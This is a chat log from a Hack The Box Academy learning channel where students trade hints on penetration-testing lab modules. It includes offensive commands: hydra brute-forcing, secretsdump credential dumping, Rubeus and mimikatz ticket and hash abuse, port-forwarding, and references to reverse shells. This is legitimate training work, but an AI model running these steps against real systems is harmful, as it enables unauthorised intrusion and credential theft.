#modules

I haven't done part 2 yet

can someone help me with Blind Data Exfiltration: Web Attacks

Yes i have done it

How did you overcome the issue if you dont mind me asking?

Im actually going insane with this thing lol

Read the source code properly @real compass

any tips : https://academy.hackthebox.com/module/112/section/1078

?

craft your hydra filter according to your source code, not using the one from examples in the module.

Write to me in private

I dont see the issue with the ones ive used thus far, like what should i omit. All it does is run user against the different password lists and stop after the first successful crack

Done 👍🏼, any help is greatly appreciated:)

https://academy.hackthebox.com/module/143/section/1279 any hint for Q8:
Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.

i cannot find a way to privesc

hey guys I am new here to this server.....by chance can any1 of u guys teach me a few things abt hacking? (friday is my last day of exams so after that I will be free to learn)

Still didn’t get it to work

then try to get a reverse shell directly instead

Didn’t work either

Set up a listener but it never connected

can you show me the payload commands

msfvenom right?

Yes

Yeah, there's a twist to that, when I was doing that module iirc

send me the command

Ok

guys?

Sure.. you can DM

i dm

im on AD enum and attacks assesment part 2, i've got password for CT059 but i can not connect to it for some reason

can someone dm me so i dont spoil anything here

i used the creds as answers on htb and it worked

but i can not connect to DC01 still

can u help me

i cannot find a way to privesc in the ms01

could u give me a hint

what section?

assessment part 2

like 2 questions behind urs

Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.

does anyone have the issue with kali when it comes to using zip2john it hashes it as a $pkzip$ instead of $pkzip2$?

Does it still decrypt ?

it wont decrypt

as a work around i used the pwnbox zip2john

just wondering if anyone knows why the kali zip2john is different?

I prefer using my kali as much as possible so i would like to have a fix for this issue for the future.

i didn't have issues with it ¯_(ツ)_/¯

Is it telling you incorrect hash or is it running through and saying exhausted

exhausted

Anyone who has osint corporate meathod

Then it's possible it's your wordlist not the hash

Gota ask few things

I thought that too

until i used the pwnbox's zip2john then moved that hash over to my kali

Just ask your question

and cracked it with the same list i was getting exhausted on

that's weird ¯_(ツ)_/¯

yeah ill keep researching it

It's actually I wanted to know if the course or module is really good for that one particular topic?

No one else that's using Kali has reported that issue

could me a me issue

as in im doing something dumb

Idk probably

I have another question

You ran it with python 2.7 or 3?

Related to web application pentesting

just ask your question it's annoying just saying you have a question

wasnt using either infront just ran
zip2john ZIP.zip > ZIP.hash

on the pwnbox it makes a hash of $pkzip2$
on the kali it makes a hash of $pkzip$

weird ¯_(ツ)_/¯

yeah for sure

hey everyone, i am at Pass the Ticket (PtT) from Linux, i got the LINUX01$ Kerberos ticket file, but i am a little lost, do i have to use windows host to use it or i am supposed to crack it to have the hashes, i tried cracking it but cant crack the hash

You just need to use the cache

And the host you're on

it gives this 'kinit: Keytab contains no suitable keys for LINUX01@INLANEFREIGHT.HTB while getting initial credentials'

Well maybe there's another one

They can expire you know 😉

Perhaps the running service has a directory to look through

the hidden one?? but nothing there related to linux01😅

It might not directly say it. Remember, caches exist

https://academy.hackthebox.com/module/143/section/1279

any hint for the Q8, i dont find anyway to get administrator in ms01

@acoustic owl Regarding "What is the FQDN of the host where the last octet ends with "x.x.x.203"?" Am I on the right track with this command?
for sub in $(cat /usr/share/seclists/Discovery/DNS/fierce-hostlist.txt);do dig any $sub.internal.inlanefreight.htb @10.129.100.209;done >> tryenum35.txt
When I use the command below:
cat tryenum35.txt | grep 203
I don't find FQDN, just the cookie id values.

Alternatively Am I on the right track with this command?
for sub in $(cat /usr/share/seclists/Discovery/DNS/fierce-hostlist.txt);do dig axfr $sub.internal.inlanefreight.htb @10.129.100.209;done >> tryenum36.txt
in both cases I get a cookie value id that matches 203 but not the ip address. Thanks for your assistance.

It's not going to be there. Try brute forcing against all the subdomains. Internal is already open, so why brute force it?

Also not sure what you're meaning by "cookie value?"

COOKIE: d53f0f3067cf57c601000000648750a616cdfee5772034c3 (good)

Try using the DNS tool showcased

Again not sure what you mean (aka you're going down a rabbit hole)

Not sure why you're using cookies

that appeared when I grepped the result

That's because it contains 203 in it

But it's not relevant

It's in the last 6 characters. Grep just checks for the match partially in the answer

Try against all subdomains in your base axfr to inlanefreight.htb

Also the brute force tool

They have

It's really good at giving you the answer

@fathom pendant Thanks appreciate :). No worries I will bruteforce the inlanefreight.htb domain. Been stuck on this for about two weeks. I Can see the summit 🙂
Did I understand you correctly?

Sort of.
Step 1) identify all subdomains
Step 2) brute force them
Your answer will be in the format a.b.inlanefreight.htb

Pls can someone help me "Attacking common services - Hard" lab last question?(DM me pls)

🥲

"Edit the php.ini file to block system(), then try to execute PHP Code that uses system. Read the /var/log/apache2/error.log file and fill in the blank: system() has been disabled for ________ reasons. " , anyone can help ?

Look for the service that runs the realm

help with what, did you do the steps

I was advised to use Google.
I have not solved it, unfortunately.
But Google gave me a ready answer.

https://academy.hackthebox.com/module/143/section/1279 Q8: Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.

someone could give me a hint please i have been stuck here all day

whats there to solve??? you just follow the provider steps

its not a trick question

"do these things. Fill in the blank"

It is just a word after one day thinking away from the point 🥲

a solid third or more of hacking AD is just pillaging what stuff you have access to already. If one tool doesnt provide the necessary information try another.

huh?

Security

what

i have his credentials

i also know ||memberof||

if you look at the subdomains, it is logical which one could be a zone.

cant be i had all

just had to open powershell with administrator -.-

sometimes it do be like that

Maybe diffrent version of zip2john?

how are u going with the exam?

u got it?

Nope didnt pass

close to pass at least?

Submitted my incomplete half assed 20 page report though. Gunna work on it while I wait for results though and the next step I can technically work on a little bit without exam access. So ill be ready on the second attempt to jump straight in for next stuff

hard to tell

well u have 1 month to prepare the 2nd attempt

and u know what u need to practice

Really isnt about preparing too much. I just didnt have time

ask for vacations for the exam

Bro Im an american

Hope it was a good experience tho, you'll get it next try

there arent holidays there?

A few, but at most I can take off like a day every couple months

I dont get paid time off

oh

is different in europe then

a week off work for the exam means I cant pay rent

oh i thought u work in IT

I do

lol

i thought americans had crazy salaries in IT

Depends on the job

my little corner slice of it is notoriously underpaid

junior pentester role will be almost double my current pay

getting a bit too offtopic though

apply to jobs without the cpts

they will interview

they have not

ill be fine I have a plan

tell u have the oscp

they wont ask to show the title

no thanks

well good luck for the next attempt 🙂

hahahahahahahhahahaha

i did that tho, worked out good

it always work they just care if u are able to do the work or not

the thing is with me, i do have the knowlegde to work with, but i dont have my diplomats

i am a self learnd in pentesting, if you know how to pentest, mind hack your boss

Hey guys I wanna be hacker

I need to learn computer basics

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

👀

Bro is funny

indeed

So u don't tolerate hackers?

am one myself

I want to be one too

I can make money from this and it sounds cool asf

just start with the hack the box academy

and choose the penetrationtester course

penetration testing is a nicer word for hacker

How long is gonna take until I can offer my services to people

there isnt a time line

you need to do this everyday

and never stop learning

Bet ur doing this gorillon years

the important of all, you have to understand what you are doing, and what the cause can be on one of your decisions

4 years now

and still learning everyday

How it all started for u bud

My English is still shit

cant say

whehere you from?

Bulgaria

far af

The fucking balkans

So idk a thing abt computers and tech

Do I have to read books

no

Fuck yeah

but you have to read alot for the theory

in htb example

maybe never

maybe some day

all depends on ur discipline

Hi guys! Module: Attacking Common Services, Easy lab. Can't access the webshell idk why

understand the payload you've written for webshell.php.

my head is going to burn now

)

The hint is, you are accessing your webshell. How does you code execute command

Where does it expect the parameters to be fed.

@wild dragon need some help

well

no idea

🥲

Learn more about how user data is passed through a GET request in HTTP.

kk

got a shell, ty)

Hi everyone i am stuck in Skills Assessment for Broken Authentication i think i have the account and i try all possible combination but same problem any hint " cant have requested role "

Hi, I'm stuck in Password Attacks- Pass the Ticket from Windows. I have done the first and second exercises, finding the number of users TGT and using john's tgt to perform a PTT attack via PS remoting. However, I can't find the second flag. The second question asks "Use John's TGT to perform a PTT attack and retrieve the flag from the shared folder. The only flag I see in the shared folder \DC01.inlanefreight.htb\john, the ||john.txt|| flag, but that is the answer to the third question and doesn't answer the 2nd question

wow getting this password in the security assessment has me wanting to run my nails down a chalkboard lol, did anyone else find a way that didnt require port forwarding? i am able to remote into the machine but no commands get executed

You need to provide more context 🙂

check out the spaces

is this for me?

Yus 😄

I guess I didn't provide enough context! 😄

lol thats a good one

but im struggling with the first part of the security assessment in the active directory enumeration and attacks module, we need to get the password of the second user and i cant seem to find a way to do so

You mean the Skill Assessment? And Skill Asessment I? Which question?

yes sorry

Hi! I am very stuck on the lab password attacks medium. I can access to ssh with a user, and i get the doc with the documentation. I know that mysql is in localhost but i cant connect to it. Someone can give me a hint please?

Thanks so much!!

its like question 6 asking for the users cleartext pw

Can you show the commands how were you trying to connect the mysql?

"mysql -u root -p" but i tried a lot of commands. I try to connect with the user j* but i cant

I am looking for config files but i dont know if i am in the right way

As I said yesterday, from my notes... I used ||mimikatz||. The trick is that you have ||to get it onto the machine and then run it.|| If you're in a shell then you'll need to figure out some way of ||executing it with appropriate credentials||.

Try to look up the stuff about mysql from footprinting

That helped me a lot

Okey! I will continue looking for it. Thanks so much for your time!

Feel free to dm

Thanks so much! It is night here now. Tomorrow I will continue testing. Thank you for offering your help. If I can't find it, I'll ask you for a hint

yes i understand that part. ive been able to access the machine from the first box but executing commands does not seem to work nor does getting the tool over

Gl

Thanks!! Same to you and to all

I was able to upload via the ||meterpreter shell|| I established in the first question, and then ||invoke remote commands against the target machine||.

thats what ive been doing... but no luck running the tools against the target/second machine 😦

Try checking out the ||Invoke-Command function||.

thats what ive been using 🙂 ive even changed groups for the user on the initial machine and still had no luck idk

Welp, I know the creds from the previous question work for it 🙂

ive been using them to access the second machine

What worked for me was RDP after port forwarding

yo how is it going

i tried win-rm for port forwarding and that errored out, ill try rdp

where are u

what do you mean

what module

active directory enumeration and attacks - skills assessment p1 - q6

the same one ive been stuck on lol

password for ||tpetty||?

thats what im trying to get still yes

what do u have

creds for the first user we need to obtain and access to the second machine

Has anyone here made it through the Attacking Splunk section in Attacking Common Applications? I've tried following the lesson step by step, but there appears to be some missing info. Like where are certain scripts supposed to go? I've tried various combinations but every time I get the same error when I try to create the tarball. It gives me an error of directory or file not found.

It would help if there were more details in the section about how to modify the reverse_shell_splunk application and whether or not to leave the files there as they are or remove all the files and start from scratch. It seems to want you to do both wich is very confusing.

dont u have the creds for ||svc_sql||?

yes

did u used them?

yes lol i can execute some commands on the second machine as that user

but i cant execute what we need in order to answer the question

nor can i get the right tools over

Okay, I got the tarball to finally upload on the site but after doing so, I get no response on my listener. Has anyone else had this issue with the Attacking Splunk section? I have the shell pointing back to my VM with the correct IP and port number, but I get nothing back on my listener.

I'm really not sure what I'm doing wrong because the lesson is a bit ambiguous as to where the different scripts are supposed to go and how to edit the bin and default folders properly.

@red current
Hi i am stuck in Skills Assessment for Broken Authentication i think i have the account and i try all possible combination but same problem any hint " cant have requested role " need some help

Sorry, I haven't done that module yet. I don't think it's even in the CPTS path that I'm on.

@red current it's okah thanks

wow, i finally got in

https://blog.mkiesel.ch/posts/oscp_pivoting/ this article just saved me lol

but mimikatz doesnt like to behave lol through my session

Oh, were you trying to run it from the local machine?

the first one that is

i was never able to get anything onto the second machine to get the password

sorry if im wording it poorly, im trying not to give away anything

Heh, its hard to explain thing and not put the answers in the channel 😄

Hey has anyone solved the second part of Skills Assessment Website on Login Brute Forcing as ive tried everything and still getting nowhere

But you can upload files to the other machines using ||Invoke-Command||. You just need to send something that makes that machine download the file.

i was never able to and couldnt find any way to get files to the machine

i tried so many different ways lol

Okay, I started from scratch and reset the instance. I'm still running into the same issue with this section on Attacking Splunk. Does anyone know what I might be doing wrong here?

Has anyone completed this?

Yes, I've gotten past it. What's the question?

Im just not sure what im doing wrong ive spent literally hours upon hours on it so far, I cracked the first bit and am on the admin portal now. Ive reused the username as stated in the hint and run it against rockyou for like an hour straight and it has accomplished nothing, nor has better default credentials i even tried a customised password list for the name "user" and its still done nothing.

You need to first try using the developer tools or Burp to get the password strings to get your parameters. That's how you need to start this second part. I hope that helps.

http-post-form “/admin_login.php:user=^USER^&pass=^PASS^:F=<form name=’log-in’” I got this ending bit and i thought this was correct

cos i used inspect to get the form name and etc so like i customised it to what it should be i believ

brb I'm having something to eat real quick.

ah okay all good mate

anyone familiar with Java Script able to help me out with JavaScript Deobfuscation module

I tried using burpsuite and i cant see any alterations i should make as the information provided was identical to that found in my html inspection

I'm pretty sure I found the flag in but posting to http://ip/keys.php but when I enter the flag it errors

You have to get the details of the admin panel using Burp or the developer tools.

Yeah ive done that tho which is how i ended up with this ending

like with form name and the url ending and etc

Okay, so it sounds like you have everything you need to set up your attack using hydra.

Okay, this is what i just ran
[ hydra -l user -P /opt/useful/SecLists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt -f -s 32607 178.62.18.68 http-post-form "/admin_login.php:user=^USER^&pass=^PASS^:F=<form name='log-in'"]

ran this last night:
hydra -l user -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -u -f 165.232.102.252 -s 31517 http-post-form "/admin_login.php:name=user&password=^PASS^:F=<form name='log-in'"

Try using rockyou.txt instead.

^

Okay, that looks right to me. That should work.

It doesnt tho, it just runs indefinetly

i let it run for an hour yesterday and it turned no result

Try using -t 4 to speed things up a bit.

yeah alright tysm ill keep you posted

👍

anyone able to assist me with deobfuscating javascript?

curl -s http://165.232.102.252:31339/keys.php -X POST -d "Param1=Sample" | xxd -p -r

^ this gives me a thing but not the traditional HTB{flag_goes_here}

also I was able to run the obfuscated xxx.js and get the code to run and give me the flag but it wont accept it

how long should i let it run for? its been going for the last 10 min and turned nothing

^ thats where i'm entering the flag from running the obfuscated js but it errors

It shouldn't take more than 5 or so.

yeah its been going for like 20 now

Any Idea what i should do cos nothing seems to be working

Bram?

Go ahead and DM me. I'll give you a hand with it.

Alrighty thanks

would that require me to uninstall john and reinstall it on the kali?

Hey fokes,
I have a kdbx file of version 4. John or hashcat doesn't support extraction of hashes. Any suggestions?

have you tried keepass2john

Yep. It says it doesn't support version 4

what about a keepass brute force script

looks like you can use keepass-cli to bruteforce the kdbx

https://github.com/r3nt0n/keepass4brute this might work

Well looks like just the resource I needed. I'll give it a shot. Thankyou

No prob

@arctic pelican hi friend, I sent you the guide for the SA of Broken Authentication module!
If you have any question, just text me!

If they are different versions and you need the same version, then you will have to install this version

You are targeting the inlanefreight.htb domain. Assess the target server and obtain the contents of the flag.txt file. Submit it as the answer.

Attacking Common Services - Easy ATTACKING COMMON SERVICES

Stuck with this

I am not sure how to crack the passwords, and I got this username

focus on another service, e.g. the one you found the username

but there is a twist that you must not forget when attacking it

What is the correct answer to the question "Which of the routes that AutoRoute adds allows 172.16.5.19 to be reachable from the attack host? (Format: x.x.x.x/x.x.x.x)"? I tried all possibilities imo, but nothing works...

from which section and module is that

I think it's from the Pivoting module

Hello, im in Password atack module Pass the ticket from windows i'm in the first activity and im trying to connect to rdp using this xfreerdp /u:Administrator /p:AnotherC0mpl3xP4$$ /v:10.129.214.47 but i have error, this are the credentials provided in the exercise, somebody know why is happen?

put the password in single quotes

works!

Frustrating module that is

I don’t like the wait lol

I’m at the password mutations now

filter the wordlist to have only words starting with b/B

Got it

Was already at the b’s

Was like a 15-20 min wait just to finish that part lol

@slender shoal wanna DM regarding Attacking common services - hard? mybe i can give you some pointers

/module/158/section/1428 => Pivoting...

dm you if you still need help

you can get the answer in two ways

one is literally somewhere in the section and the other is to replicate the things in the section

I did, but the autoroute output seems to be wrong...

I have finished Windows Privilege Escalation module expect for DnsAdmins section, despite I got to add my user to Domain Admins group I still have no access to the flag file. Neither have access to registry key. Do you have access to the flag file while for the registry key the permission is denied.

any help is well appreciated

have you logged out and logged back in?

yes I did, used gpupdate /force as well

but i only have disconnect from xfrerpd, no logout option

use the windows one

e.g. once you have the rdp session -> windows button -> sign out

just did it but with different approach, there is a shortcut ctrl + alt + delete for command options since even your method only shows me Disconnect option

thanks a lot

If you want Ctrl+Alt+Delete in RDP Session, you can use Ctrl+Alt+End

on Windows to Windows RDP, this gets executed on the remote host

hey everyone, i just want to ask is it possible to transfer files through port forwarding?? i tried it with scp but didnt work

"scp -P 2222 linikatz.sh julio@inlanefreight.htb@10.129.43.168:/home/julio@inlanefreight.htb"

A port forwarding simply forwards every packet sent to the corresponding port to the defined machine.

Example:
10.10.10.10:1234 -> 172.16.1.10:22
Any packet you send to machine 10.10.10.10 on port 1234 will then be automatically forwarded to machine 172.16.1.10 on port 22.

yes i get it, the pivot host at my example is configed to forward p 2222 to target 22 but scp doesnt work, it gives 'Permission denied, please try again' although ssh works fine

you can try with using a simple method, setting up an http server on your machine and downloading the file you want on the target

since you can SSH into the 10.129.x.x subnet it means that you can communicate with it and vice versa

i think i tried it too and didnt work, let me try it again

or use nc and cat to send and receive files over a custom port

sorry but there's something i dont understand, so i made a reverse connection with Chisel to my attack host on port 8080, and i want to start a http server to upload a file from the victim to attack host, should i start it at what port exactly?? i tried uploading the file at port 8080 but it wont work

a port that is from your choosing

as long as you can reach your attack machine to the target you are ok

it has nothing to do with port forwarding and etc

so i can use my attack host ip at the victim host upload??

try and you will see

thanks a lot 😅 😂 i just get it, didnt know i can now directly connect to it

realy appreciate your time 🥰

😂 hope you some good time at it

I hope you to have good time at pivoting

for all those struggling with pivoting: draw a network map on a piece of paper!

if you're not used to it or not into networking, it helps to get your head around it

😉

stuck on bypassing filter on Topology machine , anyone can help me get pass this

upp @everyone

#1117149690249617408

if you have no access, read #welcome and #rules

sup guys, any help in Documentation & Reporting skills assessment, I do not know where to move, I am stuck at first question, would appreciate if somn give me some direction on it, thanks

On the host you will find notes. Take a close look at them. What could you do with all this information?

like i cannot proccess that info, just stuck I am trying to perform attacks such as pth, but nothing works neither smb listing

Look at this Informations
|| Inlanefreight Penetration Test > Evidence > Notes > 6. Credentials ||

With this you should get further

thanks a lot

some Cybersecurity training vendors limit how many times Metasploit can be used on lab exams. Here at Hack The Box, we encourage experimenting with tools in our lab environments until you have a solid foundational understanding.

HTB casually burning OffSec

Hello, im trying to do zip2john im using this zip2john Notes.zip > notes.hash and then im trying to crack it using this john --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt notes.hash but i dont have result, somebody can help? I have this ded 1 password hash (PKZIP [32/64]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status 0g 0:00:00:00 DONE (2023-06-13 15:49) 0g/s 18625Kp/s 18625Kc/s 18625KC/s !joley08!..*7¡Vamos! Session completed

use a different wordlist

you have already created one from a previous section

thanks

cryolite modules are too hard and i waste a loot of time

isnt better spend 4 hours with a password is stupid

you learn nothing

You learn that it's important to find the right list.
rockyou is not a miracle cure all

yeah true that haha im hitting 5 hours with password attack hard

that its important to find right list

having trouble with the final question in Web Server Pivoting with Rpivot. i'm able to get a verified connection between my attack host and pivot host. i then use the proxychains firefox command but the website just hangs. i figured i would try it with pwnbox as well but the same issue happens. i was thinking about using the NTLM authentication command but i dont know what the ip of <ip address of proxy> would be. could use a nudge. thanks

Thanks man. This section is absolutely horrible. The article on Medium describes is way better.

no need to NTLM authentication. make sure you close down firefox before running it through proxychains. won't work otherwise

hmmm, i never had it open to begin with. i'll try again. thanks

if you can't get it to work, feel free to dm. I can take a closer look

I need a hint for Attacking Common Services - Hard, the question is "What file can you retrieve that belongs to the user "simon"? (Format: filename.txt)"

I'm new here on this platform. The "find" command may be of help

you do have his creds, right?

yes

go through the available services, think about where you could find files and grab them from there

I try a lot of way like smbmap but I do not get anything!

all you need is smbclient

Thanks ❤️

anyone did the advanced SQL injections skill assessment? have managed to get the unauth sqli but i have some issues with getting the login

@acoustic owl

sorry for bothering you, but digging after an hour I even got nothing, I actually got the password for administrator in smb shares, but it is not working

Try to use the password in the notes to get more credentials

Bro what should I do here "Submit the contents of the flag.txt file on the Administrator Desktop."

which module?

Attacking Common Services - Hard

should I exploit smh zzz_archive?

the path to that is a bit more complicated. go through what you've learned and see if anything can help you get administrative access

get admin privilege with the user you found

Module: Kerberos Attacks
Section: Unconstrained Delegation - Computers
Question: Compromise the Domain and read the content of \DC01\C$\Unconstrained\flag.txt
I used printer bug to get TGT and then used mimikatz to dump ntlm hash of brian.willis. But I cant access c$

No, you first need to find more user credentials

After you have requested the ticket, you need to renew it again

Module: Pivoting, Tunneling, and port forwarding
Section: web server pivoting with rpivot
I need help with the last question. I have run server.py on the attack host, and run the client.py on the pivot host, but i still cannot connect to 172 16.5 135 via proxychains

did you have firefox open while attempting to run it through proxychains?

Yes, i run proxychains firefox-esp 172.16.5.135:80. Firefox opens but cannot load the page

if firefox is open when you run that command, it won't work. close down firefox, then try again

I see. Thanks a lot

I did the following

1. started Rubeus and used spoolsample to request dc01$ tgt
2. the .\Rubeus.exe renew /ticket:doIF...... /ptt
3. Mimikatz to dump brian.willis ntlm hash
4. .\Rubeus.exe asktgt /rc4:888...... /user:brian.willis /ptt

not sure what im missing but getting error

did you managed to resolve this?

5. .\Rubeus.exe renew /ticket:doI……… /ptt

can someone help me with windows fundamentals? i cant access any smb share, i just get timeout, rechecked the vm on site and vpn everything is up
i also checked smbclient on my vm and it works perfectly

ok imma reset the target, maybe it will help

Yep.

can i dm you for this?

nah its not

In about 30 minutes once the painkillers and caffiene kick in. But in meantime, make sure you don't use JD-GUI. Use fernflower. JD-GUI screws up the decompilation.

let me try fernflower 🙂 i used jdgui for that

If you're at the stage I think you are, you should spot the difference immediately between the two sets of decompiled code.

@acoustic owl I really run out of ideas, PowerView works neither, I cannot even read desription fields like idk

i saw the difference, but the email is of length 15 and password is empty and i still didn't get the right key

Password isn't empty. Its a 60 char bcrypt hash.

anyone can help with skills assessment? I stuck on the first question

haha.. this module channel is warroom I swear. Massive respect for the community people who are helping everyone pretty much for free

The AD Enumeration module is particularly a brutal module

Its one of the modules that everyone seems to get stuck on, and since its a T2 module, its more accessible than some of the comparably hard ones, such as Adv. SQl injection, HTTP attacks, etc.

This is the password column of the user table right?

It is... but you're probably hitting the other issue that I hit. 🙂

The ||black list filtering works on pieces of words, not just whole words. Look at the filter for a word that might be inside the word password|| 🙂

So, on completing the skill assessment 2 for Windows PE. I PE'd the machine and I added my user to the local administrators group. I ran mimikatz to dump the system sam/lsa but I couldn't (I even tried again after loggin out and in). But, I ran it smooth in the Administrator account which dumped me the sam.

does it got to do with the UACs?

hi

Hi, anyone faced credentials issue while RDP to the target machine?

wrong credentials, which were already mentioned in the wuestions part of the module

which command did you use?

Hey all, can't connect to starting point machine, anyone else have a similar issue?

simple rdp into windows machine from windows

try putting the password in single quotes

in LLMNR/NBT-NS Poisoning - from Windows module

already tried, but same wrong credentials man

#starting-point is your best bet to find someone who can help you

ty!

it says I dont have access to that?

then read #welcome and #rules first

ty

np 🙂

what was the channel u originally linked that I should go to?

sorry I can't see it

what syntax are you using

#starting-point

ty!

normally RDP from windows machine to a target windows machine

well, unless you provide the command (syntax) we can't help you much

no worries man, even I am unable to upload the image here

you can copy and paste the command

man, in windows gui is there for RDP

to upload an image you will have to verify your account #welcome and #rules , but you need to have an account on https://hackthebox.com

can you type the username alone here

mask it, if it's sensitive.

username which you're entering into the RDP client

alright, what error do you get when you RDP?

wrong credentials?

yes

you can use xfreerdp through teh workstation

anyone faced this issue before?

not sure why you are trying to use your main pc to connect?

earlier machines worked fine, only this one is giving me error

I believe xfreerdp automatically does the domain prepend for you, try the username with DOMAIN\username

this module

addiotionally, it is not recommended to use your main pc with the vpn

yes but username is htb-student only

submitted a ticket to the htb academy support, waiting for them to respond

INLANEFREIGHT\htb-student did you try this?

use the provided workstation or a vm

the credentials are working, I've just tested

thanks man, now it works

with this INLANEFREIGHT\htb-student username

it's a domain user, so you need to prepend the domain name or it'll consider it as local login (This is for the windows RDP client)
When you do it through xfreerdp, it automatically does it for you

ohhky, got it, thanks man

@autumn pilot man, so would I use linux vm or the vm which is there on htb academy?

which one is recommended?

whichever makes you more comfortable

local vm would be fine then, thanks man @autumn pilot

hi i've got a machine "error" to say, can i dm a moderator please? thanks.

its supposed to work but its not working 🤷‍♂️ :/

i alr texted people that have done it and they said it should work

im trying to use powerview function but its not working, i import powerview

imported*

hello

is introduction to network module is enough or i should take CCNA or N+ to understand the network terminolgies which was in labs and pentester job path?

I am in the AD Enumeration & Attacks - Skills Assessment Part I

Last question of the assessment

"Take over the domain and submit the contents of the flag.txt file on the Administrator Desktop on DC01"

I got the clear text creds of|| t*|| my proxychain command fails.

DC IP : 172.16.6.3 (DC01)
Webserver IP : 10.129.202.242,172.16.5.100

I ran this on webserver: netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.202.242 connectport=445connectaddress=172.16.6.3

in proxychains.conf i commented out the socks4 127.0.0.1 9050
and added socks5 10.129.202.242 8080

And when i ran this command proxychains secretsdump.py -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/tpetty@172.16.6.3 -use-vss
I get this error:

[proxychains] Strict chain ... 10.129.202.242:8080 ... 172.16.6.3:445 <--socket error or timeout!
[-] RemoteOperations failed: [Errno Connection error (172.16.6.3:445)] [Errno 111] Connection refused
[] Cleaning up...*

Can anyone help me with am i missing or doing wrong?
Thanks

what could be the error here?

Not being able to extend an instance might be the most annoying thing ever

|| UserSPN ||

got serveral errors...

@acoustic owl Can you please take a look at my question. Thanks

@acoustic owl

I also checked if windows defender is enabled but its not

so i really dont know what else can be the problem

i also restared the machine

and tried but same stuff again

Put the error and command in chatgpt and see if it can help

i did man

it just says check if powerview path is good

and it is lol

lol

which section is it?

AD enum and attacks, assement part 2

last part

oh! you are ahead of me

can you help me with my question

this one

??

No need to go for CCNA or N+ if you understand the common concepts related Networking

CCNA is a very separated course, I am certified CCNP and i never needed it, it was just a waste of time

so ,is network fundmentals module is enough?

I believe so

ok thanks

how to i completely clear my kali linux space and reset it to new

ffs why is this not working :((, i tried uploading a new powerview but nothing. i also tried getting a rev shell instead ov evil-winrm but same stuff

Something weird is happening with my VPN connection on HTB academy. I am on eu-academy-1 server and I'm not able to make any requests on port 80 (and possibly 443) on any of the targets when connected via VPN. I can access them from the in-browser VM. Is anyone else facing this issue?

guys i really need help how do i delete kali

i want to delete all of my storage in kali and make it new

somebody help

please

In your proxychains should be the IP 127.0.0.1 instead of the IP 10.129.202.242

i also checked the md5sum values and the powerview is not corrupted

anyone has any tip for going faster on password cracking network services? it's taking forever

[DATA] max 4 tasks per 1 server, overall 4 tasks, 94044 login tries (l:1/p:94044), ~23511 tries per task
[DATA] attacking ssh://<ip>:22/
[STATUS] 41.00 tries/min, 41 tries in 00:01h, 94003 to do in 38:13h, 4 active

I'm using pwnbox to decrease the network lag already

I can’t seem to figure out how to mount the backup vhd in the password attack hard labs 😓

how to i reset my kali and delete everything to make it like new

make sure the VPN you're using matches the one selected on the academy website

which module/section?

well I know how to do it on windows but I assume you're doing it on linux?

guys how do i reset my kali linuc

*linux

either reinstall or run from docker in the first place

how

try #1024429874246590575 , this is the wrong channel

man this is bullsh*t

its not woring

working for no reason

It is important that you know how networks work. You should know the OSI model and what happens on which layer. This helps enormously.

i even downloaded the latest powerview and transfered it from my host to ssh then from ssh to machine host

same bs

https://academy.hackthebox.com/module/147/section/1391

can i dm you maybe about my problem? except if ur still on ur vacation :D

I am still on vacation, but currently online. Sure, send me a DM.
I have lost the overview currently here in the channel. No idea who has what problem.

yeah look for other available services. ssh is hella slow. also make sure you use a solid amount of threads

The question asks for that
Use this wordlist to brute force the SSH password for the user "sam".

I have that happening in my dms all the time 😅

Yup, in pwnbox…

I know, but there are other services that can be bruteforced faster. I fell for the exact same trap

filter out words starting with b/B

Absolute horrendous lab

This is easier because everything always belongs together.

cool, thanks

thanks, it's a good idea also

yeah that's why I always pull people over to dms

Is it even possible to use gparted in pwnbox?

Just closes instantly for me

Well, it's nice when others can profit a little from it as well

true I guess, but it's just too much going on usually

Huge +rep for @acoustic owl... bro being the community hero. Literally helped with my CPTS path

44 tries in 00:01h, 21068 to do in 07:59h, 4 active lol cool, I hope I wont need bruteforce too many times in cpts

Is it even possible to mount the vhd in pwnbox? Or do I need to use something external

i think it is possible

Been stuck trying to do it for 4 hours now

https://itsfoss.com/mount-encrypted-windows-partition-linux/

Tried that as well, but doesn’t matter what partition I pick

Neither works

I am having this same exact problem right now. Any tips?

i did it in my vm

sudo apt-get update; sudo apt-get install dislocker -y
sudo mkdir -p /media/bitlocker
sudo mkdir -p /media/bitlockermount
sudo losetup -f -P Backup.vhd
sudo dislocker /dev/loop0p2 -uPASSWORDHERE -- /media/bitlocker
sudo mount -o loop /media/bitlocker/dislocker-file /media/bitlockermount

No dice

The only partitions that show are sda1 and 2 and neither works

can you give us exact steps to reproduce? error seems weird

It's weird, it's like that other ticket just doesn't exist. I see it there when I list hidden files, but I can't operate with it or even copy it

I'll get to this in a few minutes. don't worry, didn't forget you

No worries bro, I just now got it. Didn't do anything different. Just listed the files again and I SWEAR the ticket file name changed 😂 Used that one and it worked

ooof xD
Well glad you got it 😄

This lab is starting to piss me off now

Command not found looks like the powerview/active directory modules aren't running

Literally spent more time mounting that damn thing than doing all of the module

I'm having a ton of issues with Password Attacks - Pass The Ticket from Linux - "Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01" question if anybody here gets the chance. Not really even sure where to start here.

Look for the service that controls the realm

That directory can be useful

referring to the ||realmd ||directory?

No, I'm referring to the daemon/service that you see when you type realm

I found out what service you mean, and I'm in that directory, and I suppose I'm supposed to be looking for a ccache file, but I have either not found anything or I'm not sure what I'm looking for.

Just look around and you'll find it. That directory was just the start

just mount it in windows

linux is too complicated

That's what I ended up doing. Like 3 minutes of work, if you do this lol

same

though if anyone knows a linux way I'd love to add that to my notes 😄

.

ah true I forgot lol

thanks for the reminder

it never worked for me but well lol

You connected to the instance with a windows vm and moved the backup to there?

shared folder between kali vm and windows host for me

so in the upload skill assessment i found a way to svg read source code but i cant seem to find the path to /upload.php

I'm sorry I'm still very lost. I feel like there is something fundamental that I'm missing

just tested the commands from payloadbunny. works for me

Just got it, thanks!

i just transfered the vhd to windows

and mounted it

